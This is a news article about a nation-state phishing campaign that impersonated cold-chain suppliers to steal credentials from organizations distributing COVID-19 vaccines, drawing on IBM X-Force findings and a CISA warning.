A sophisticated global phishing operation has been underway since September 2020, targeting entities involved in the distribution of COVID-19 vaccines. According to IBM Security X-Force researchers, these attacks, believed to be orchestrated by a nation-state actor, focus on the vaccine cold chain—the critical supply line managing the storage and transport of the vaccine at controlled temperatures.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has responded to this alarming trend by issuing a warning, advising organizations involved in Operation Warp Speed (OWS) to review potential indicators of compromise (IoCs) and enhance their security measures.
While it remains unclear if the phishing attempts achieved any success, IBM has alerted the appropriate authorities about these targeted attacks. The emails primarily targeted organizations spanning Italy, Germany, South Korea, the Czech Republic, and other regions, including notable bodies like the European Commission’s Directorate-General for Taxation and Customs Union and various private firms linked to the vaccine supply chain.
IBM’s analysis indicates that attackers focused on organizations tied to the Gavi vaccine alliance, aiming to gather credentials that would allow for unauthorized access to corporate networks and sensitive COVID-19 distribution data. To lend legitimacy to their deceit, the phishing emails were crafted to resemble requests for quotations related to vaccine program participation. In one instance, the attackers impersonated a business executive associated with Haier Biomedical, a legitimate player in the cold chain sector, to make the messages appear trustworthy.
According to IBM researchers Claire Zaboeva and Melissa Frydrych, “The emails contain malicious HTML attachments that require recipients to submit their credentials to view the file.” The activity suggests a clear intent to exploit harvested usernames and passwords for further espionage and theft of intellectual property across victim organizations.
Within the wider context of cybersecurity, the ongoing focus on COVID-19 vaccine research represents a lucrative target for malicious cyber activity. Since early 2020, the development and research surrounding COVID-19 vaccines have faced persistent cyber threats. Earlier this year, IBM revealed a similar phishing campaign against a German entity involved in personal protective equipment procurement.
These escalating cyber assaults prompted the U.S. Department of Justice to file charges against two Chinese nationals linked to efforts to steal sensitive data from various organizations, including those producing COVID-19 vaccines. Recent incidents have also highlighted attacks purportedly carried out by state-sponsored actors from Russia and North Korea, targeting pharmaceutical companies involved in vaccine development worldwide.
The tactics employed in these attacks align with several categories outlined in the MITRE ATT&CK framework, notably initial access and credential harvesting, as well as lateral movement techniques following potential access to compromised systems. While the full extent of the threat actor’s identity remains unidentified, their strategies underscore a continued vulnerability across organizations critical to vaccine distribution and public health preparedness.
